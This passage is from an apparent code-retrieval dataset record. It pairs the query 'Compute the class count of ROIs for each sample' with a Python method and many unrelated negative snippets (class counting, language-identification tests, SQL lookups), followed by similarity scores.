de la Península\", \"label\": \"es\"},\n {\"text\": \"Grundlage für dieses Verfahren sind spezielle\", \"label\": \"de\"},\n {\"text\": \"Rechtsausschuß vorgelegten Entwurf der Richtlinie\", \"label\": \"de\"},\n {\"text\": \"Im so genannten Portalgeschäft sei das Unternehmen\", \"label\": \"de\"},\n {\"text\": \"ⲏ ⲉⲓϣⲁⲛϥⲓ ⲛⲉⲓⲇⲱⲗⲟⲛ ⲉⲧϩⲙⲡⲉⲕⲏⲓ ⲙⲏ ⲉⲓⲛⲁϣϩⲱⲡ ⲟⲛ ⲙⲡⲣⲏ\", \"label\": \"cop\"},\n {\"text\": \"juego podían matar a cualquier herbívoro, pero\", \"label\": \"es\"},\n {\"text\": 
\"Nach Angaben von Axent nutzen Unternehmen aus der\", \"label\": \"de\"},\n {\"text\": \"hrdiny Havlovy Zahradní slavnosti (premiéra ) se\", \"label\": \"cs\"},\n {\"text\": \"Een zin van heb ik jou daar\", \"label\": \"nl\"},\n {\"text\": \"hat sein Hirn an der CeBIT-Kasse vergessen .\", \"label\": \"de\"},\n {\"text\": \"καὶ τοὺς ἐκπλαγέντας οὐκ ἔχειν ἔτι ἐλεγχομένους\", \"label\": \"grc\"},\n {\"text\": \"nachgewiesenen langfristigen Kosten , sowie den im\", \"label\": \"de\"},\n {\"text\": \"jučer nakon četiri dana putovanja u Helsinki.\", \"label\": \"hr\"},\n {\"text\": \"pašto paslaugos teikėjas gali susitarti su\", \"label\": \"lt\"},\n {\"text\": \"В результате, эти золотые кадры переходят из одной\", \"label\": \"ru\"},\n {\"text\": \"द फाइव-ईयर एंगेजमेंट में अभिनय किया जिसमें जैसन\", \"label\": \"hi\"},\n {\"text\": \"výpis o počtu akcií.\", \"label\": \"cs\"},\n {\"text\": \"Enfin, elles arrivent à un pavillon chinois\", \"label\": \"fr\"},\n {\"text\": \"Tentu saja, tren yang berhubungandengan\", \"label\": \"id\"},\n {\"text\": \"Arbeidarpartiet og SV har sikra seg fleirtal mot\", \"label\": \"nn\"},\n {\"text\": \"eles: 'Tudo isso está errado' , disse um\", \"label\": \"pt\"},\n {\"text\": \"The islands are in their own time zone, minutes\", \"label\": \"en\"},\n {\"text\": \"Auswahl debütierte er am .\", \"label\": \"de\"},\n {\"text\": \"Bu komisyonlar, arazilerini satın almak için\", \"label\": \"tr\"},\n {\"text\": \"Geschütze gegen Redmond aufgefahren .\", \"label\": \"de\"},\n {\"text\": \"Time scything the hours, but at the top, over the\", \"label\": \"en\"},\n {\"text\": \"Di musim semi , berharap mengadaptasi Tintin untuk\", \"label\": \"id\"},\n {\"text\": \"крупнейшей геополитической катастрофой XX века.\", \"label\": \"ru\"},\n {\"text\": \"Rajojen avaaminen ei suju ongelmitta .\", \"label\": \"fi\"},\n {\"text\": \"непроницаемым, как для СССР.\", \"label\": \"ru\"},\n {\"text\": \"Ma non mancano le polemiche.\", \"label\": \"it\"},\n {\"text\": \"Internet als Ort politischer Diskussion und auch\", \"label\": \"de\"},\n {\"text\": \"incomplets.\", \"label\": \"ca\"},\n {\"text\": \"Su padre luchó al lado de Luis Moya, primer Jefe\", \"label\": \"es\"},\n {\"text\": \"informazione.\", \"label\": \"it\"},\n {\"text\": \"Primacom bietet für Telekom-Kabelnetz\", \"label\": \"de\"},\n {\"text\": \"Oświadczenie prezydencji w imieniu Unii\", \"label\": \"pl\"},\n {\"text\": \"foran rattet i familiens gamle Baleno hvis døra på\", \"label\": \"no\"},\n {\"text\": \"[speaker:laughter]\", \"label\": \"sl\"},\n {\"text\": \"Dog med langt mindre utstyr med seg.\", \"label\": \"nn\"},\n {\"text\": \"dass es nicht schon mit der anfänglichen\", \"label\": \"de\"},\n {\"text\": \"इस पर दोनों पक्षों में नोकझोंक शुरू हो गई ।\", \"label\": \"hi\"},\n {\"text\": \"کے ترجمان منیش تیواری اور دگ وجئے سنگھ نے بھی یہ\", \"label\": \"ur\"},\n {\"text\": \"dell'Assemblea Costituente che posseggono i\", \"label\": \"it\"},\n {\"text\": \"и аште вьси съблазнѧтъ сѧ нъ не азъ\", \"label\": \"cu\"},\n {\"text\": \"In Irvine hat auch das Logistikunternehmen Atlas\", \"label\": \"de\"},\n {\"text\": \"законодательных норм, принимаемых существующей\", \"label\": \"ru\"},\n {\"text\": \"Κροίσῳ προτείνων τὰς χεῖρας ἐπικατασφάξαι μιν\", \"label\": \"grc\"},\n {\"text\": \"МИНУСЫ: ИНФЛЯЦИЯ И КРИЗИС В ЖИВОТНОВОДСТВЕ.\", \"label\": \"ru\"},\n {\"text\": \"unterschiedlicher Meinung .\", \"label\": \"de\"},\n {\"text\": \"Jospa joku ystävällinen sielu auttaisi kassieni\", \"label\": \"fi\"},\n {\"text\": 
\"Añadió que, en el futuro se harán otros\", \"label\": \"es\"},\n {\"text\": \"Sessiz tonlama hem Fince, hem de Kuzey Sami\", \"label\": \"tr\"},\n {\"text\": \"nicht ihnen gehört und sie nicht alles , was sie\", \"label\": \"de\"},\n {\"text\": \"Etelästä Kuivajärveen laskee Tammelan Liesjärvestä\", \"label\": \"fi\"},\n {\"text\": \"ICANNs Vorsitzender Vint Cerf warb mit dem Hinweis\", \"label\": \"de\"},\n {\"text\": \"Norsk politikk frå til kan dermed, i\", \"label\": \"nn\"},\n {\"text\": \"Głosowało posłów.\", \"label\": \"pl\"},\n {\"text\": \"Danny Jones -- smithjones@ev.net\", \"label\": \"en\"},\n {\"text\": \"sebeuvědomění moderní civilizace sehrála lučavka\", \"label\": \"cs\"},\n {\"text\": \"относительно спокойный сон: тому гарантия\", \"label\": \"ru\"},\n {\"text\": \"A halte voiz prist li pedra a crïer\", \"label\": \"fro\"},\n {\"text\": \"آن‌ها امیدوارند این واکسن به‌زودی در دسترس بیماران\", \"label\": \"fa\"},\n {\"text\": \"vlastní důstojnou vousatou tváří.\", \"label\": \"cs\"},\n {\"text\": \"ora aprire la strada a nuove cause e alimentare il\", \"label\": \"it\"},\n {\"text\": \"Die Zahl der Vielleser nahm von auf Prozent zu ,\", \"label\": \"de\"},\n {\"text\": \"Finanzvorstand von Hotline-Dienstleister InfoGenie\", \"label\": \"de\"},\n {\"text\": \"entwickeln .\", \"label\": \"de\"},\n {\"text\": \"incolumità pubblica.\", \"label\": \"it\"},\n {\"text\": \"lehtija televisiomainonta\", \"label\": \"fi\"},\n {\"text\": \"joistakin kohdista eri mieltä.\", \"label\": \"fi\"},\n {\"text\": \"Hlavně anglická nezávislá scéna, Dead Can Dance,\", \"label\": \"cs\"},\n {\"text\": \"pásmech od do bodů bodové stupnice.\", \"label\": \"cs\"},\n {\"text\": \"Zu Beginn des Ersten Weltkrieges zählte das\", \"label\": \"de\"},\n {\"text\": \"Així van sorgir, damunt els antics cementiris,\", \"label\": \"ca\"},\n {\"text\": \"In manchem Gedicht der spätern Alten, wie zum\", \"label\": \"de\"},\n {\"text\": \"gaweihaida jah insandida in þana fairƕu jus qiþiþ\", \"label\": \"got\"},\n {\"text\": \"Beides sollte gelöscht werden!\", \"label\": \"de\"},\n {\"text\": \"modifiqués la seva petició inicial de anys de\", \"label\": \"ca\"},\n {\"text\": \"В день открытия симпозиума состоялась закладка\", \"label\": \"ru\"},\n {\"text\": \"tõestatud.\", \"label\": \"et\"},\n {\"text\": \"ἵππῳ πίπτει αὐτοῦ ταύτῃ\", \"label\": \"grc\"},\n {\"text\": \"bisher nie enttäuscht!\", \"label\": \"de\"},\n {\"text\": \"De bohte ollu tuollárat ja suttolaččat ja\", \"label\": \"sme\"},\n {\"text\": \"Klarsignal från röstlängdsläsaren, tre tryck i\", \"label\": \"sv\"},\n {\"text\": \"Tvůrcem nového termínu je Joseph Fisher.\", \"label\": \"cs\"},\n {\"text\": \"Nie miałem czasu na reakcję twierdzi Norbert,\", \"label\": \"pl\"},\n {\"text\": \"potentia Schöpfer.\", \"label\": \"de\"},\n {\"text\": \"Un poquito caro, pero vale mucho la pena;\", \"label\": \"es\"},\n {\"text\": \"οὔ τε γὰρ ἴφθιμοι Λύκιοι Δαναῶν ἐδύναντο τεῖχος\", \"label\": \"grc\"},\n {\"text\": \"vajec, sladového výtažku a některých vitamínových\", \"label\": \"cs\"},\n {\"text\": \"Настоящие герои, те, чьи истории потом\", \"label\": \"ru\"},\n {\"text\": \"praesumptio:\", \"label\": \"la\"},\n {\"text\": \"Olin justkui nende vastutusel.\", \"label\": \"et\"},\n {\"text\": \"Jokainen keinahdus tuo lähemmäksi hetkeä jolloin\", \"label\": \"fi\"},\n {\"text\": \"ekonomicky výhodných způsobů odvodnění těžkých,\", \"label\": \"cs\"},\n {\"text\": \"Poprvé ve své historii dokázala v kvalifikaci pro\", \"label\": \"cs\"},\n {\"text\": 
\"zpracovatelského a spotřebního průmyslu bude nutné\", \"label\": \"cs\"},\n {\"text\": \"Windows CE zu integrieren .\", \"label\": \"de\"},\n {\"text\": \"Armangué, a través d'un decret, ordenés l'aturada\", \"label\": \"ca\"},\n {\"text\": \"to, co nás Evropany spojuje, než to, co nás od\", \"label\": \"cs\"},\n {\"text\": \"ergänzt durch einen gesetzlich verankertes\", \"label\": \"de\"},\n {\"text\": \"Насчитал, что с начала года всего три дня были\", \"label\": \"ru\"},\n {\"text\": \"Borisovu tražeći od njega da prihvati njenu\", \"label\": \"sr\"},\n {\"text\": \"la presenza di ben veleni diversi: . chili di\", \"label\": \"it\"},\n {\"text\": \"καὶ τῶν ἐκλεκτῶν ἀγγέλων ἵνα ταῦτα φυλάξῃς χωρὶς\", \"label\": \"grc\"},\n {\"text\": \"pretraživale obližnju bolnicu i stambene zgrade u\", \"label\": \"hr\"},\n {\"text\": \"An rund Katzen habe Wolf seine Spiele getestet ,\", \"label\": \"de\"},\n {\"text\": \"investigating since March.\", \"label\": \"en\"},\n {\"text\": \"Tonböden (Mullböden).\", \"label\": \"de\"},\n {\"text\": \"Stálý dopisovatel LN v SRN Bedřich Utitz\", \"label\": \"cs\"},\n {\"text\": \"červnu předložené smlouvy.\", \"label\": \"cs\"},\n {\"text\": \"πνεύματι ᾧ ἐλάλει\", \"label\": \"grc\"},\n {\"text\": \".%의 신장세를 보였다.\", \"label\": \"ko\"},\n {\"text\": \"Foae verde, foi de nuc, Prin pădure, prin colnic,\", \"label\": \"ro\"},\n {\"text\": \"διαπέμψας ἄλλους ἄλλῃ τοὺς μὲν ἐς Δελφοὺς ἰέναι\", \"label\": \"grc\"},\n {\"text\": \"المسلمين أو أي تيار سياسي طالما عمل ذلك التيار في\", \"label\": \"ar\"},\n {\"text\": \"As informações são da Dow Jones.\", \"label\": \"pt\"},\n {\"text\": \"Milliarde DM ausgestattet sein .\", \"label\": \"de\"},\n {\"text\": \"De utgår fortfarande från att kvinnans jämlikhet\", \"label\": \"sv\"},\n {\"text\": \"Sneeuw maakte in Davos bij de voorbereiding een\", \"label\": \"nl\"},\n {\"text\": \"De ahí que en este mercado puedan negociarse\", \"label\": \"es\"},\n {\"text\": \"intenzívnějšímu sbírání a studiu.\", \"label\": \"cs\"},\n {\"text\": \"और औसकर ४.० पैकेज का प्रयोग किया गया है ।\", \"label\": \"hi\"},\n {\"text\": \"Adipati Kuningan karena Kuningan menjadi bagian\", \"label\": \"id\"},\n {\"text\": \"Svako je bar jednom poželeo da mašine prosto umeju\", \"label\": \"sr\"},\n {\"text\": \"Im vergangenen Jahr haben die Regierungen einen\", \"label\": \"de\"},\n {\"text\": \"durat motus, aliquid fit et non est;\", \"label\": \"la\"},\n {\"text\": \"Dominować będą piosenki do tekstów Edwarda\", \"label\": \"pl\"},\n {\"text\": \"beantwortet .\", \"label\": \"de\"},\n {\"text\": \"О гуманитариях было кому рассказывать, а вот за\", \"label\": \"ru\"},\n {\"text\": \"Helsingin kaupunki riitautti vuokrasopimuksen\", \"label\": \"fi\"},\n {\"text\": \"chợt tan biến.\", \"label\": \"vi\"},\n {\"text\": \"avtomobil ločuje od drugih.\", \"label\": \"sl\"},\n {\"text\": \"Congress has proven itself ineffective as a body.\", \"label\": \"en\"},\n {\"text\": \"मैक्सिको ने इस तरह का शो इस समय आयोजित करने का\", \"label\": \"hi\"},\n {\"text\": \"No minimum order amount.\", \"label\": \"en\"},\n {\"text\": \"Convertassa .\", \"label\": \"fi\"},\n {\"text\": \"Как это можно сделать?\", \"label\": \"ru\"},\n {\"text\": \"tha mi creidsinn gu robh iad ceart cho saor shuas\", \"label\": \"gd\"},\n {\"text\": \"실제 일제는 이런 만해의 논리를 묵살하고 한반도를 침략한 다음 , 이어 만주를 침략하고\", \"label\": \"ko\"},\n {\"text\": \"Da un semplice richiamo all'ordine fino a grandi\", \"label\": \"it\"},\n {\"text\": \"pozoruhodný nejen po umělecké stránce, jež\", \"label\": \"cs\"},\n 
{\"text\": \"La comida y el servicio aprueban.\", \"label\": \"es\"},\n {\"text\": \"again, connected not with each other but to the\", \"label\": \"en\"},\n {\"text\": \"Protokol výslovně stanoví, že nikdo nemůže být\", \"label\": \"cs\"},\n {\"text\": \"ఒక విషయం అడగాలని ఉంది .\", \"label\": \"te\"},\n {\"text\": \"Безгранично почитая дирекцию, ловя на лету каждое\", \"label\": \"ru\"},\n {\"text\": \"rovnoběžných růstových vrstev, zůstávají krychlové\", \"label\": \"cs\"},\n {\"text\": \"प्रवेश और पूर्व प्रधानमंत्री लाल बहादुर शास्त्री\", \"label\": \"hi\"},\n {\"text\": \"Bronzen medaille in de Europese marathon.\", \"label\": \"nl\"},\n {\"text\": \"- gadu vecumā viņi to nesaprot.\", \"label\": \"lv\"},\n {\"text\": \"Realizó sus estudios primarios en la Escuela Julia\", \"label\": \"es\"},\n {\"text\": \"cuartos de final, su clasificación para la final a\", \"label\": \"es\"},\n {\"text\": \"Sem si pro něho přiletí americký raketoplán, na\", \"label\": \"cs\"},\n {\"text\": \"Way to go!\", \"label\": \"en\"},\n {\"text\": \"gehört der neuen SPD-Führung unter Parteichef\", \"label\": \"de\"},\n {\"text\": \"Somit simuliert der Player mit einer GByte-Platte\", \"label\": \"de\"},\n {\"text\": \"Berufung auf kommissionsnahe Kreise , die bereits\", \"label\": \"de\"},\n {\"text\": \"Dist Clarïen\", \"label\": \"fro\"},\n {\"text\": \"Schon nach den Gerüchten , die Telekom wolle den\", \"label\": \"de\"},\n {\"text\": \"Software von NetObjects ist nach Angaben des\", \"label\": \"de\"},\n {\"text\": \"si enim per legem iustitia ergo Christus gratis\", \"label\": \"la\"},\n {\"text\": \"ducerent in ipsam magis quam in corpus christi,\", \"label\": \"la\"},\n {\"text\": \"Neustar-Melbourne-IT-Partnerschaft NeuLevel .\", \"label\": \"de\"},\n {\"text\": \"forderte dagegen seine drastische Verschärfung.\", \"label\": \"de\"},\n {\"text\": \"pemmican på hundrede forskellige måder.\", \"label\": \"da\"},\n {\"text\": \"Lehån, själv matematiklärare, visar hur den nya\", \"label\": \"sv\"},\n {\"text\": \"I highly recommend his shop.\", \"label\": \"en\"},\n {\"text\": \"verità, giovani fedeli prostratevi #amen\", \"label\": \"it\"},\n {\"text\": \"उत्तर प्रदेश के अध्यक्ष पद से हटाए गए विनय कटियार\", \"label\": \"hi\"},\n {\"text\": \"() روزی مےں کشادگی ہوتی ہے۔\", \"label\": \"ur\"},\n {\"text\": \"Prozessorgeschäft profitieren kann , stellen\", \"label\": \"de\"},\n {\"text\": \"školy začalo počítat pytle s moukou a zjistilo, že\", \"label\": \"cs\"},\n {\"text\": \"प्रभावशाली पर गैर सरकारी लोगों के घरों में भी\", \"label\": \"hi\"},\n {\"text\": \"geschichtslos , oder eine Farce , wie sich\", \"label\": \"de\"},\n {\"text\": \"Ústrednými mocnosťami v marci však spôsobilo, že\", \"label\": \"sk\"},\n {\"text\": \"التسليح بدون مبرر، واستمرار الأضرار الناجمة عن فرض\", \"label\": \"ar\"},\n {\"text\": \"Například Pedagogická fakulta Univerzity Karlovy\", \"label\": \"cs\"},\n {\"text\": \"nostris ut eriperet nos de praesenti saeculo\", \"label\": \"la\"}]\n \n docs = [Document([], text=example[\"text\"]) for example in examples]\n gold_labels = [example[\"label\"] for example in examples]\n basic_multilingual(docs)\n accuracy = sum([(doc.lang == label) for doc,label in zip(docs,gold_labels)])/len(docs)\n assert accuracy >= 0.98", "def rl_s(rl):\r\n c.execute(\"SELECT * FROM personnel WHERE role=:role COLLATE NOCASE\", {'role': rl})\r\n return c.fetchall()", "def normalize(w):\n\n nfkd = unicodedata.normalize('NFKD', w)\n return ''.join(x for x in nfkd if unicodedata.category(x)[0] == 'L').lower()" ]
[ "0.6623606", "0.65305656", "0.65305656", "0.64108706", "0.64108706", "0.63947916", "0.63842875", "0.6326007", "0.6215365", "0.6073148", "0.60546684", "0.58473516", "0.583685", "0.55808395", "0.5559438", "0.53668314", "0.5345691", "0.5240828", "0.52396196", "0.523723", "0.5231429", "0.5169655", "0.51657677", "0.51557344", "0.5080345", "0.5068122", "0.50593", "0.505509", "0.50448436", "0.5031999", "0.5014203", "0.497184", "0.4970613", "0.49705786", "0.49705786", "0.49014503", "0.48825485", "0.48825485", "0.48741487", "0.4865283", "0.48451665", "0.48420146", "0.48374146", "0.48239025", "0.4823787", "0.48221442", "0.48177055", "0.48001385", "0.47959554", "0.47866267", "0.4774249", "0.47708055", "0.47540864", "0.4748772", "0.4744818", "0.47263968", "0.4722051", "0.4709131", "0.47076643", "0.47066227", "0.46963865", "0.46928656", "0.46916798", "0.468339", "0.46831048", "0.46731696", "0.4671535", "0.46591413", "0.46555427", "0.4651946", "0.46462137", "0.46435046", "0.46376988", "0.4634208", "0.46290013", "0.46260944", "0.46254772", "0.46125275", "0.46105796", "0.46090353", "0.46052533", "0.45993504", "0.45835778", "0.45788965", "0.4564968", "0.45618254", "0.45592207", "0.45581025", "0.4557343", "0.455589", "0.4552599", "0.45522055", "0.45503455", "0.45428804", "0.45416284", "0.4541069", "0.4540956", "0.45277953", "0.45216256", "0.4521464", "0.45199272" ]
0.0
-1
Compute the class count of ROIs for each sample.
def count_classes(self, index=None):
    if index is None:
        index = np.arange(self.Samples.shape[0])
    elif isinstance(index, int):
        index = [index]

    count = np.zeros((len(index), len(self._classes)), dtype=np.int)

    for _ind in range(len(index)):
        rois = self.__getrois__(index[_ind])
        count[_ind, :] = np.bincount(rois[:, 4].astype(np.int),
                                     minlength=len(self._classes))

    return count
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_num_classes(self):", "def resultCounter(detections):\n counter = 0\n for attribute, value in classIterator(detections):\n if 'crease' in attribute:\n counter += len(value)\n return counter", "def class_counts(rows):\n counts = {} # a dictionary of label -> count.\n for row in rows:\n # in our dataset format, the label is always the last column\n label = row[-1]\n if label not in counts:\n counts[label] = 0\n counts[label] += 1\n return counts", "def class_counts(rows):\n counts = {} # a dictionary of label -> count.\n for row in rows:\n # in our dataset format, the label is always the last column\n label = row[-1]\n if label not in counts:\n counts[label] = 0\n counts[label] += 1\n return counts", "def class_counts(rows):\n counts = {} # a dictionary of label -> count.\n for row in rows:\n # in our dataset format, the label is always the last column\n label = row[-1]\n if label not in counts:\n counts[label] = 0\n counts[label] += 1\n return counts", "def count_classes(labels):\n class_dict = {}\n for image in labels:\n for row in image:\n for label in row:\n if label not in class_dict:\n class_dict[label] = 1\n else:\n class_dict[label] += 1\n return class_dict", "def get_roi_counts(self):\n counts = [[roi.counts for roi in group.rois] for group in self.roi_groups]\n return counts", "def get_class_count(df):\r\n \r\n return df[\"class\"].value_counts()", "def computeNumClass(self):\n # Get the number of data\n n = len(self.data)\n # For IQR\n # First, compute the position of the first and third quartile\n fQPos = ( (n - 1) / 4 ) + 1\n tQPos = ( (3 * (n - 1)) / 4 ) + 1\n # Get the quartiles\n firstQ = 0.0\n thirdQ = 0.0\n if fQPos == round(fQPos):\n firstQ = self.data[int(fQPos)]\n else:\n up = round(fQPos)\n firstQ = self.data[up - 1] + ((self.data[up] - self.data[up - 1]) / 4.0)\n if tQPos == round(tQPos):\n thirdQ = self.data[int(tQPos)]\n else:\n up = round(tQPos)\n thirdQ = self.data[up - 1] + (3 * (self.data[up] - self.data[up - 1]) / 4.0)\n # Compute the IQR\n IQR = thirdQ - firstQ\n # Compute the number of classes and its length\n self.numBins = int(2 * IQR * m.pow(n, -1/3))\n self.computeBinWidth()", "def num_classes():\n return NUM_CLASSES", "def summarize_classes(classes):\n u, indices = np.unique(classes,return_inverse=True)\n num_u=len(u)\n print(\"****************************\")\n print(\"Number of samples: {0}\".format(len(classes)))\n print(\"Number of Classes:{0}\".format(num_u))\n for c in u:\n num_c=np.sum(classes==c)\n print(\"Class {0}: {1} Samples\".format(c,num_c))\n print(\"****************************\")", "def gen_img_counts(img_path, model):\n\n img = transform(Image.open(img_path).convert('RGB'))\n print(type(img))\n output = model(img.unsqueeze(0))\n pred_count = int(output.detach().cpu().sum().numpy())\n return pred_count", "def classes_calculations(input):\n counts, _ = np.histogram(input, bins=int(\n input.max() + 1), range=(0, int(input.max())))\n return np.nonzero(counts)[0]", "def class_distribution(y): \n # ===================== PLEASE WRITE HERE =====================\n \n bin_array = np.bincount(y)\n n_class1 = bin_array[1]\n n_class2 = bin_array[2]\n n_class3 = bin_array[3]\n \n # ===================== PLEASE WRITE HERE =====================\n \n print('Number of samples in class_1:', n_class1)\n print('Number of samples in class_2:', n_class2)\n print('Number of samples in class_3:', n_class3)", "def classesAndFrames(self):\n classes = defaultdict(int)\n with open(self.inputfile) as fin:\n for line in fin:\n arr = line.strip().split()\n y = 
int(arr[1])\n classes[y] += 1\n return classes", "def num_classes(self):\n raise NotImplementedError", "def get_num_classes(df):\n classes = df.groupby('class_label')\n return classes.ngroups", "def test_class_counts(self):\n oz = ClassificationScoreVisualizer(GaussianNB())\n oz.fit(self.multiclass.X.train, self.multiclass.y.train)\n\n unique, counts = np.unique(self.multiclass.y.train, return_counts=True)\n npt.assert_array_equal(oz.classes_, unique)\n npt.assert_array_equal(oz.class_counts_, counts)", "def num_classes(self) -> int:\n y = self.data.y\n if y is None:\n return 0\n elif y.numel() == y.size(0) and not torch.is_floating_point(y):\n return int(self.data.y.max()) + 1\n elif y.numel() == y.size(0) and torch.is_floating_point(y):\n return torch.unique(y).numel()\n else:\n return self.data.y.size(-1)", "def __uniqueCounts(rows):\n results = {} #Initialize a dictionary to store the results\n for row in rows: #Iterate over all rows of data\n #The result is the last column\n r = row[-1]\n if r not in results: results[r] = 0 #Start the count for each class at zero\n results[r] += 1 #Increment the count for this row's class by 1\n return results", "def _classify(self, sample):\n # This function is used so that we can reduce each row with respect \n # to the sample.\n def calc_dist(vector):\n return distance_utils.euclidean(vector, sample)\n\n distances = self.training_set.reduce_rows(calc_dist)\n \n votes = self._tally_votes(self.training_set.get_labels(), distances)\n \n return collection_utils.get_key_with_highest_value(votes)", "def sample_count(self):", "def cluster_obs_count(self):\n return(self.merged_data.groupby(\n 'labels').count().transpose().iloc[0, :])", "def num_of_classes(self):\n return len(self.classes_())", "def num_of_classes(self):\n return len(self.classes_())", "def get_num_cat(sample_by_cat, samples_in_otus):\r\n num_cat = defaultdict(int)\r\n for cat, samples in sample_by_cat.items():\r\n num_samples = len(set(samples_in_otus) & set(samples))\r\n num_cat[cat[0]] += (num_samples * (num_samples - 1)) / 2\r\n return num_cat", "def num_classes(self):\n\t\treturn 10", "def count_target_class_data(data, target_class):\n count = 0\n for row in data:\n if row[0] == target_class:\n count += 1\n\n return count", "def get_class_count(Y_category):\n # Assertions\n assert isinstance(Y_category, np.ndarray), \\\n 'Input must be a numpy ndarray.'\n cls, counts = np.unique(Y_category, return_counts = True)\n cls_counts = dict(zip(cls, counts))\n\n return cls_counts", "def count(self, cls=None):\n return len(self.all(cls))", "def get_gini(self, rows):\n label_count = defaultdict(int)\n total_count = 0\n for row in rows:\n label = row[self.target_attribute]\n label_count[label] += 1\n total_count += 1\n return 1 - sum([np.square(float(label_count[label])/total_count) for label in label_count.keys()])", "def num_classes(self):\n\t\treturn len(self.classes)", "def n_classes(self):\n raise NotImplementedError", "def n_classes(self):\n raise NotImplementedError", "def num_classes(self):\n return len(self.classes)", "def countObjects(self, classType):\n count = 0\n for dobj in self.doId2do.values():\n if isinstance(dobj, classType):\n count += 1\n return count", "def get_num_classes(dataset: str):\n if dataset == \"imagenet\" or dataset == \"kitti\":\n return 1000\n elif dataset == \"cifar10\" or dataset == \"mnist\" or dataset == \"fashion_mnist\":\n return 10", "def getClassCounts(b):\n c = {k:0 for k in labels.keys()}\n for r in b:\n c[r[0]] += 1\n return c", "def 
num_classes(self):\n\t\t\treturn len(self.classes)", "def numberOfClasses(self):\n classes = self.classesAndFrames()\n return len(classes.keys())", "def class_size(self):\n\t\tif self.subject.count()==0:\n\t\t\treturn student.objects.all().filter(reg=self).count()\n\t\telse:\n\t\t\treturn self.grade_set.all().distinct().count()", "def countclass(self, comb_res, origin_df):\r\n clsdic_ratio = {}\r\n self.clsdic_df = {}\r\n # totalcount = df['count'].sum() # no sum of count but the num of id which attr contains cls\r\n clslist = comb_res['组合需求'].apply(lambda x: x.split('.')[1]).unique().tolist()\r\n\r\n totalcount = len(origin_df[origin_df.attr.apply(self.judge, args=(clslist, ))])\r\n for cls in clslist:\r\n # dfcls = comb_res[comb_res['组合需求'].str.contains(cls)] # no count but distinct id\r\n df_cls = origin_df[origin_df.attr.apply(self.judge, args=(clslist, cls,))]\r\n self.clsdic_df[cls] = df_cls\r\n clsdic_ratio[cls] = round(len(df_cls) / totalcount * 100, 2)\r\n return sorted(clsdic_ratio.items(), key=lambda x: (x[1], x[0]), reverse=True)", "def num_classes(self):\n return self._num_classes", "def classify(self, features):\n\n # TODO: finish this.\n class_labels = []\n # TODO: finish this.\n features = np.array(features)\n feat_shape = features.shape\n for i in range(feat_shape[0]):\n vote = np.zeros((self.num_trees))\n for j in range(self.num_trees):\n #print self.trees[j].classify(feat)\n vote[j] = self.trees[j].classify(features[i,self.attr_track[j]].reshape(1,-1))[0]\n counts = np.bincount(vote.astype(int))\n class_labels.append(np.argmax(counts))\n return class_labels", "def count_class(srcfile, listfile):\n cls_list = []\n\n # open the list file\n with open(listfile, 'r') as f:\n lines = f.readlines()\n\n # check each file in the list\n for line in lines:\n xml_file = srcfile.format(line.strip())\n\n tree = ET.parse(xml_file)\n\n # objs is all the objects in the xml\n objs = tree.findall('object')\n\n # find the class name in the object, and add it to the cls list\n for ix, obj in enumerate(objs):\n cls = str(obj.find('name').text)\n cls_list.append(cls)\n\n # find the keys and sort, count the number of boxes of the keys\n if len(cls_list) > 0:\n cls_list.sort()\n import numpy as np\n cls_arr = np.array(cls_list)\n cls1 = list(set(cls_list))\n print('unsort classes is:', cls1)\n cls1.sort()\n print('sorted classes is:', cls1)\n classes = np.unique(cls_arr)\n print('the class number is:', classes.shape[0])\n print('----------------------------')\n print('the number of each class:')\n for i in range(0, classes.shape[0]):\n # print(classes[i], cls_list.count(classes[i]))\n print(classes[i], ':', np.where(cls_arr==classes[i])[0].shape[0])\n print('----------------------------')\n\n print('the number of all the boxes is:', len(cls_list))\n return cls_list", "def estimate_class(self, observation: np.ndarray) -> int:\n neighbor_classes, distances = self.get_neighbor_classes(observation)\n weights = 1 / np.square(distances)\n classes = np.unique(neighbor_classes)\n class_weight = [sum(weights[neighbor_classes == neighbor_class]) for neighbor_class in classes]\n return classes[np.argmax(class_weight)]", "def trainCount(\n trainData, \n questionType,\n questionDict,\n questionIdict, \n objDict, \n objIdict,\n numAns):\n count_wa = np.zeros((len(objIdict), numAns))\n count_a = np.zeros((numAns))\n objIds = extractObjId(\n trainData[0], \n questionType, \n questionDict, \n questionIdict)\n for i in range(objIds.shape[0]):\n objId = objIds[i]\n obj = questionIdict[objId - 1]\n ansId = 
trainData[1][i, 0]\n objId2 = objDict[obj]\n count_wa[objId2, ansId] += 1\n count_a[ansId] += 1\n # Add UNK count\n count_a[-1] += 1\n return count_wa, count_a", "def get_class_counts(files):\n return pd.Series(['_'.join([file.split('_')[0], file.split('_')[1]]) for file in files]).value_counts()", "def calc_class_weights(self):\n y = self.train_eval_data[\"sentiment\"]\n self.class_weights = {}\n classes = np.unique(y)\n for cls in classes:\n self.class_weights[cls] = len(y) / (len(classes) * (y == cls).sum())", "def _success_count(cls, samples: Samples) -> int:\n return cls.__sample_count(samples, \"true\")", "def get_num_of_images(self):", "def class_callcount(self):\r\n # timing is stored by node, we compute timing by class on demand\r\n rval = {}\r\n for node, count in self.apply_callcount.items():\r\n typ = type(node.op)\r\n rval.setdefault(typ, 0)\r\n rval[typ] += count\r\n return rval", "def get_number_of_classes(self):\n return len(self.class_dict.keys())", "def n_classes(self):\n raise NotImplementedError()", "def check_correctness_statistics(classifier_out, mode, image_type):\n labels = image_type.image_data[mode].labels\n num_correct = 0\n total = len(classifier_out)\n for index, label in classifier_out:\n if labels[index] == label:\n num_correct += 1\n return (num_correct / total) * 100", "def calcNumberOfMajorityClassRows(self, data, structure):\n maxCount, classIndex = 0, structure['class']['index']\n for value in structure['class']['values']:\n newData = list(filter(lambda y: y[classIndex] == value, data))\n if len(newData) >= maxCount:\n maxCount = len(newData)\n return maxCount", "def _get_observation_count(self):\n observation_count = 0\n for sequence in self.seq_list:\n observation_count += sequence.shape[0] \n \n return observation_count", "def get_label_counts(dataset_path: str):\n if not dataset_path:\n return None\n td = ImageFolder(root=dataset_path)\n # get label distribution\n label_counts = [0] * len(td.classes)\n for p, l in td.samples:\n label_counts[l] += 1\n return label_counts", "def classify(self, instance):\n numerator = 0\n denominator = 0\n for training_instance in self.training_data:\n h_value = self._h_function(instance, training_instance[0])\n numerator = numerator + h_value*training_instance[1]\n denominator = denominator + h_value\n return numerator/denominator", "def classProbs(observation, tree, classes):\n res = classify(observation, tree) #res = results\n total = sum(res.values())\n probs = []\n for c in classes:\n if c in res.keys():\n probs.append(float(res[c])/total)\n else:\n 